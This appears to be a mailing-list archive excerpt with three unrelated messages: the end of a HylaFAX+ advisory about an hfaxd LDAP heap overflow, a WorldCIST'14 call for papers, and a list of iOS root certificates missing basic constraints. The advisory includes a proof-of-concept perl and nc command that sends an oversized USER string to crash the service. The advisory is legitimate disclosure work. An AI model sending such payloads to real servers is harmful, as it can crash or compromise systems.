character set.  At a minimum, this can crash or hang a hfaxd forked
client.  At this time, we have not attempted to construct an actual
exploit that leverages this security bug.

“hfaxd” typically runs as the “uucp” user, and forks on each new
connection.  The heap overflow occurs in a forked child.  Typically,
the child will simply hang.  We theorize (but have not tested) that an
attacker could consume system resources by abusing the heap overflow.
Although this has not been confirmed, the possibility that an attacker
may be able to execute arbitrary code in the hfaxd context can not
be ruled out.

It should be noted that the principle author of HylaFAX+, Lee Howard,
did not write the LDAP code - it was supplied by a third party.  After
I discovered the bug, Lee and I worked together to fix it, exchanging
code patches, performing peer-review and testing.  All use of strcat
was replaced with snprintf.

For the vulnerability to be exposed, one must first compile
HylaFAX+with LDAP support, and then configure LDAP in hfaxd.conf.
Simply compiling with LDAP support alone is insufficient to produce a
vulnerable system.

Lee and I suspect that the number of HylaFAX+ installations with LDAP
support configured are extremely low, if not zero.

This vulnerability does not exist in other versions of HylaFAX.
HylaFAX+ was forked from code at hylafax.org in 2005, 3 years before
the problematic LDAP code was added to HylaFAX+


Solution
===
1) Update to HylaFAX+ v5.5.4
   (http://hylafax.sourceforge.net/news/5.5.4.php) or later.
-OR-
2) Disable LDAP authentication (edit hfaxd.conf)


Proof-of-concept
===
1) Enable LDAP authentication on the hfaxd server.  Note, a valid LDAP
server need not exist.  Simply setting the “LDAPServerURI:” directive
in “/usr/local/lib/fax/hfaxd.conf” is sufficient.

# grep ^LDAPServerURI /usr/local/lib/fax/hfaxd.conf
LDAPServerURI:   ldap://127.0.0.1:389

2) Start (or restart) the hfaxd process.  Run inside valgrind to see
the heap overwrite get caught.
# valgrind ./hfaxd/hfaxd -c /usr/local/lib/fax/hfaxd.conf -l
192.168.2.33 -q /var/spool/fax -i hylafax -d

3) Run this script from a client system.  NOTE: If testing on the same
server as the host, don’t connect to “localhost” / 127.0.0.1.  This
will not invoke LDAP (not sure why):

# # Test authentication without buffer overflow:
# perl -le 'print USER .(xx10).12345\nPASS test-ldap\nQUIT\n\n '
| nc -q 5:5 192.168.2.33 4559
(seen on client)
nc: using stream socket
220 localhost server (HylaFAX (tm) Version 5.5.4) ready.
331 Password required for xx12345.
530 Bind LDAP error -1: Can't contact LDAP server
530 Login incorrect.

4) Test again, but increase the amount of data in the “USER” command
to overwrite the heap:

# perl -le 'print USER .(xx500).12345\nPASS test-ldap\nQUIT\n\n
' | nc -q 5:5 192.168.2.33 4559
(client)
220 localhost server (HylaFAX (tm) Version 5.5.4) ready.
331 Password required for

CFP: WorldCIST'14 - World Conference on IST, at Madeira Island

2013-09-30 Thread Maria Lemos
Apologies if you are receiving this mail more than once...


**
 WorldCIST'14
The 2014 World Conference on Information Systems and Technologies
April 15 - 18, Madeira Island, Portugal
   http://www.aisti.eu/worldcist14/
**

The 2014 World Conference on Information Systems and Technologies 
(WorldCIST'14: http://www.aisti.eu/worldcist14) is a global forum for 
researchers and practitioners to present and discuss the most recent 
innovations, trends, results, experiences and concerns in the several 
perspectives of Information Systems and Technologies.

We are pleased to invite you to submit your papers to WorldCISTI'14. All 
submissions will be reviewed on the basis of relevance, originality, importance 
and clarity.

 
THEMES

Submitted papers should be related with one or more of the main themes proposed 
for the Conference:

A) Information and Knowledge Management (IKM);

B) Organizational Models and Information Systems (OMIS);

C) Intelligent and Decision Support Systems (IDSS);

D) Software Systems, Architectures, Applications and Tools (SSAAT);

E) Computer Networks, Mobility and Pervasive Systems (CNMPS);

F) Human-Computer Interaction (HCI);

G) Health Informatics (HIS);

H) Information Technologies in Education (ITE).


TYPES OF SUBMISSIONS AND DECISIONS

Four types of papers can be submitted:

Full paper: Finished or consolidated RD works, to be included in one of the 
Conference themes. These papers are assigned a 10-page limit.

Short paper: Ongoing works with relevant preliminary results, open to 
discussion. These papers are assigned a 7-page limit.

Poster paper: Initial work with relevant ideas, open to discussion. These 
papers are assigned to a 4-page limit.

Company paper: Companies' papers that show practical experience, R  D, tools, 
etc., focused on some topics of the conference. These papers are assigned to a 
4-page limit.

Submitted papers must comply with the format of Advances in Intelligent Systems 
and Computing Series (see Instructions for Authors at Springer Website or 
download a DOC example) be written in English, must not have been published 
before, not be under review for any other conference or publication and not 
include any information leading to the authors’ identification. Therefore, the 
authors’ names, affiliations and bibliographic references should not be 
included in the version for evaluation by the Program Committee. This 
information should only be included in the camera-ready version, saved in Word 
or Latex format and also in PDF format. These files must be accompanied by the 
Consent to Publication form filled out, in a ZIP file, and uploaded at the 
conference management system.

All papers will be subjected to a “double-blind review” by at least two members 
of the Program Committee.

Based on Program Committee evaluation, a paper can be rejected or accepted by 
the Conference Chairs. In the later case, it can be accepted as the type 
originally submitted or as another type. Thus, full papers can be accepted as 
short papers or poster papers only. Similarly, short papers can be accepted as 
poster papers only. In these cases, the authors will be allowed to maintain the 
original number of pages in the camera-ready version.

The authors of accepted poster papers must also build and print a poster to be 
exhibited during the Conference. This poster must follow an A1 or A2 vertical 
format. The Conference includes Work Sessions where these posters are presented 
and orally discussed, with a 5 minute limit per poster.

The authors of accepted full papers will have 15 minutes to present their work 
in a Conference Work Session; approximately 5 minutes of discussion will follow 
each presentation. The authors of accepted short papers and company papers will 
have 11 minutes to present their work in a Conference Work Session; 
approximately 4 minutes of discussion will follow each presentation.


PUBLICATION AND INDEXING

To ensure that a full paper, short paper, poster paper or company paper is 
published in the Proceedings, at least one of the authors must be fully 
registered by the 24th of January 2014, and the paper must comply with the 
suggested layout and page-limit. Additionally, all recommended changes must be 
addressed by the authors before they submit the camera-ready version.

No more than one paper per registration will be published in the Conference 
Proceedings. An extra fee must be paid for publication of additional papers, 
with a maximum of one additional paper per registration.

Full and short papers will be published in Proceedings by Springer, in Advances 
in Intelligent Systems and Computing Series. Poster and company papers will be 
published in Proceedings by AISTI.

Published full and short papers will be submitted 

iOS: List of available trusted root certificates

2013-09-30 Thread Jeffrey Walton
From iOS: List of available trusted root certificates,
http://support.apple.com/kb/HT5012.

There's no reason to allow some of this to occur in 2013. As a
proxy-relying-party, Apple is responsible for this stuff because users
are not allowed to make the decisions or modify the Trust Store.

For reference:
Peter Gutmann, Engineering Security,
www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf‎
Baseline Certificate Requirements:
https://www.cabforum.org/Baseline_Requirements_V1_1_6.pdf
Extended Validation Certificate Requirements:
https://www.cabforum.org/Guidelines_v1_4_3.pdf

Subject: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c)
1999 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 4
Public Primary Certification Authority - G3
Serial Number: ec:a0:a7:8b:6e:75:6a:01:cf:c4:7c:cc:2f:94:5e:d7
Missing Critical Basic Constraint and CA=TRUE

Subject: C=DK, O=TDC Internet, OU=TDC Internet Root CA
Serial Number: 986490188 (0x3acca54c)
Missing Critical Basic Constraint

Subject: CN=T\xC3\x9CRKTRUST Elektronik Sertifika Hizmet
Sa\xC4\x9Flay\xC4\xB1c\xC4\xB1s\xC4\xB1, C=TR, L=ANKARA, O=(c) 2005
T\xC3\x9CRKTRUST Bilgi \xC4\xB0leti\xC5\x9Fim ve Bili\xC5\x9Fim
G\xC3\xBCvenli\xC4\x9Fi Hizmetleri A.\xC5\x9E.
Serial Number: 1 (0x1)
Missing Critical Basic Constraint

Subject: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref.
(limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure
Server Certification Authority
Serial Number: 927650371 (0x374ad243)
Missing Critical Basic Constraint

Subject: C=CN, O=UniTrust, CN=UCA Root
Serial Number: 9 (0x9)
Missing Critical Basic Constraint

Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary
Certification Authority
Serial Number: 70:ba:e4:1d:10:d9:29:34:b6:38:ca:7b:03:cc:ba:bf
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary
Certification Authority
Serial Number: 3c:91:31:cb:1f:f6:d0:1b:0e:9a:b8:d0:44:bf:12:be
Missing Critical Basic Constraint and CA=TRUE

Subject: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert
Class 2 Policy Validation Authority,
CN=http://www.valicert.com//emailAddress=i...@valicert.com
Serial Number: 1 (0x1)
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 3 Public Primary
Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For
authorized use only, OU=VeriSign Trust Network
Serial Number: 7d:d9:fe:07:cf:a8:1e:b7:10:79:67:fb:a7:89:34:c6
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 4 Public Primary
Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For
authorized use only, OU=VeriSign Trust Network
Serial Number: 32:88:8e:9a:d2:f5:eb:13:47:f8:7f:c4:20:37:25:f8
Missing Critical Basic Constraint and CA=TRUE

Subject: C=IL, O=StartCom Ltd., OU=Secure Digital Certificate Signing,
CN=StartCom Certification Authority
Serial Number: 1 (0x1)
Missing Critical Basic Constraint

Subject: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert
Class 1 Policy Validation Authority,
CN=http://www.valicert.com//emailAddress=i...@valicert.com
Serial Number: 1 (0x1)
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 1 Public Primary
Certification Authority
Serial Number: cd:ba:7f:56:f0:df:e4:bc:54:fe:22:ac:b3:72:aa:55
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 1 Public Primary
Certification Authority
Serial Number: 3f:69:1e:81:9c:f0:9a:4a:f3:73:ff:b9:48:a2:e4:dd
Missing Critical Basic Constraint and CA=TRUE

Subject: C=CN, O=UniTrust, CN=UCA Global Root
Serial Number: 8 (0x8)
Missing Critical Basic Constraint

Subject: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c)
1999 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 2
Public Primary Certification Authority - G3
Serial Number: 61:70:cb:49:8c:5f:98:45:29:e7:b0:a6:d9:50:5b:7a
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=U.S. Government, OU=DoD, OU=PKI, CN=DoD CLASS 3 Root CA
Serial Number: 4 (0x4)
Missing Critical Basic Constraint

Subject: C=KR, O=KISA, OU=Korea Certification Authority Central,
CN=KISA RootCA 3
Serial Number: 2 (0x2)
Missing Critical Basic Constraint and CA=TRUE

Subject: C=US, O=VeriSign, Inc., OU=Class 2 Public Primary
Certification Authority - G2, OU=(c) 1998 VeriSign, Inc. - For
authorized use only, OU=VeriSign Trust Network
Serial Number: b9:2f:60:cc:88:9f:a1:7a:46:09:b8:5b:70:6c:8a:af
Missing Critical Basic Constraint and CA=TRUE

Subject: C=TW, O=Chunghwa Telecom Co., Ltd., OU=ePKI Root
Certification Authority
Serial Number: 15:c8:bd:65:47:5c:af:b8:97:00:5e:e4:06:d2:bc:9d
Missing Critical Basic Constraint

Subject: C=US, O=GTE Corporation, OU=GTE CyberTrust Solutions, Inc.,
CN=GTE CyberTrust Global